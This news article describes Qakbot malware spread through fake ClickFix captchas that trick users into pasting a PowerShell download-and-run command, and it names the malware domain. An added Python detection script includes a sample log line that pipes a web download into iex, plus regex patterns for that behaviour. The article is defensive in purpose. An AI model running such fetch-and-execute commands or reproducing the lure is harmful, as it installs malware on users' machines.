Malware: Qakbot distributed with false captchas
The Qakbot Trojans have been quiet for some time. Now criminals are distributing new variants with fake captchas.
(Image: Created with AI in Bing Creator by heise online / dmk)
The malware Qakbot flew under the radar for a long time – now IT researchers have detected new variants of the Trojan. They are currently finding victims via fake "Clickfix Captchas". The German Federal Office for Information Security also recently issued a warning about these.
A phishing campaign in which Qakbot malware was distributed in an attempt to rebuild the botnet was last reported at the end of 2023. IT security researchers from Darkatlas have now come across the malware again. It is now being distributed using so-called fake captchas.
Fake captchas with user interaction
In the fake captcha scam, criminals take advantage of the fact that internet users are asked to solve so-called captchas everywhere. This is to prove that they are human and not malicious scripts ("I am not a robot").
(Image: heise online / dmk)
The click does two things. First, a malicious command is placed on the clipboard; it launches Windows PowerShell and instructs the powerful command-line interpreter to download a script from a website and execute it. Second, the click advances to the next graphic.
(Image: heise online / dmk)
That graphic contains instructions on how to open the Windows prompt for executing commands and paste in the command from the clipboard. As a distraction, the criminals call the window that pops up a "verification window". Finally, the victims have to press the Enter key – but then it's "game over": the malware is installed and activated.
Darkatlas explains the infection process in more detail. The command that is copied to the clipboard ends with a pipe to "iex", which causes PowerShell to interpret the received string as a command (iex = Invoke-Expression). Most of the malware script is encoded, but a few plain-text commands open a window titled "Information" that displays "Verification complete!" so that the process appears legitimate.
The script downloads a ZIP file, saves it, extracts it and finally executes its contents. No matter what file name appears in the URL of the download script, the server delivers a malware ZIP file. The use of arbitrary URLs also makes detection and blocking more difficult. Darkatlas tested a sample with VirusTotal, and the detection rate is close to zero. Darkatlas does not provide any Indicators of Compromise (IOCs); it does, however, name the actual malware domain: duolingos[.]com.
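Because the download URL and file name are arbitrary, blocking by indicator is weak; a detection has to key on the behaviour described above instead (PowerShell launched from the desktop shell, a web download, a pipe into iex, an archive extraction). The following scorer is an added example, not code from heise online or Darkatlas: it parses constructed key=value process-creation records (the field names and the placeholder domain are assumptions) and flags the ClickFix pattern.

```python
import re

# Behavioural indicators from the ClickFix chain described above. The URL and the
# file name are deliberately not matched: the article notes they are arbitrary.
INDICATORS = [
    # pipe into Invoke-Expression: the downloaded text is run as a command
    ("pipe_to_iex", re.compile(r"\|\s*(iex|invoke-expression)\b", re.I), 3),
    # fetching a script or ZIP archive from a web server
    ("web_download", re.compile(
        r"\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b",
        re.I), 2),
    # unpacking the downloaded archive before running its contents
    ("zip_extract", re.compile(r"\bexpand-archive\b", re.I), 1),
]
# PowerShell spawned by the desktop shell is what pasting the clipboard into the
# Windows command prompt looks like in process-creation telemetry (assumption).
INTERACTIVE_PARENT_WEIGHT = 2
THRESHOLD = 5
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_event(line: str) -> dict:
    """Parse one constructed key=value process-creation record into a dict."""
    return {k: q if q else u for k, q, u in KV_RE.findall(line)}

def score_event(event: dict) -> tuple:
    """Return (score, matched indicator names) for one process-creation event."""
    score, hits = 0, []
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return score, hits  # only PowerShell launches are of interest here
    if event.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        hits.append("launched_from_explorer")
        score += INTERACTIVE_PARENT_WEIGHT
    for name, pattern, weight in INDICATORS:
        if pattern.search(event.get("CommandLine", "")):
            hits.append(name)
            score += weight
    return score, hits

# Constructed sample telemetry; the domain is a placeholder, not a real IOC.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = [
    rf'ParentImage=C:\Windows\explorer.exe Image={PS} CommandLine="powershell -NoProfile -Command Get-Process"',
    rf'ParentImage=C:\Windows\explorer.exe Image={PS} CommandLine="powershell -c iwr http://placeholder.invalid/anyname.txt | iex"',
    rf'ParentImage=C:\Windows\System32\svchost.exe Image={PS} CommandLine="powershell -File C:\Scripts\nightly-backup.ps1"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        score, hits = score_event(parse_event(line))
        print("SUSPICIOUS" if score >= THRESHOLD else "ok", score, hits)
```

Only the second record crosses the threshold; an interactive PowerShell session and a scheduled script stay below it, which is the point of scoring several weak signals together rather than alerting on any one of them.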
The BSI warned against such fake captchas on the Mastodon social network at the beginning of the month. In an interview with heise online, the co-founder of "Friendly Captcha" also discussed the scam.
(dmk)